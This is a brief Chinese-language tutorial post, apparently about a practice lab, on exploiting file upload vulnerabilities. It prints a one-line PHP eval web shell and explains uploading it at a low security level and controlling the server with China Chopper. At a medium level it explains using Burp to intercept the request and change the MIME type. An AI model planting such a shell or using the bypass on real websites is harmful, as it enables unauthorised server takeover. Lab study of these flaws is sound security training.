网络安全:文件上传漏洞
程序员文章站
2022-03-25 10:34:34
...
<?php @eval($_POST['chopper']);?>
在low 安全级别下,将包含上述代码的php文件上传到没有进行上传数据类型保护的网站功能中。然后用中国菜刀爬下所有文件,可以对文件进行操纵。
在medium安全级别下,后台限制lmime文件类型和文件大小,导致文件上传失败,则需要使用Burp软件。Burp这个软件主要目的是代理和拦截。拦截之后作出修改,修改成想要的类型。
上一篇: 字典工具
下一篇: 新手巡风Windows 安装过程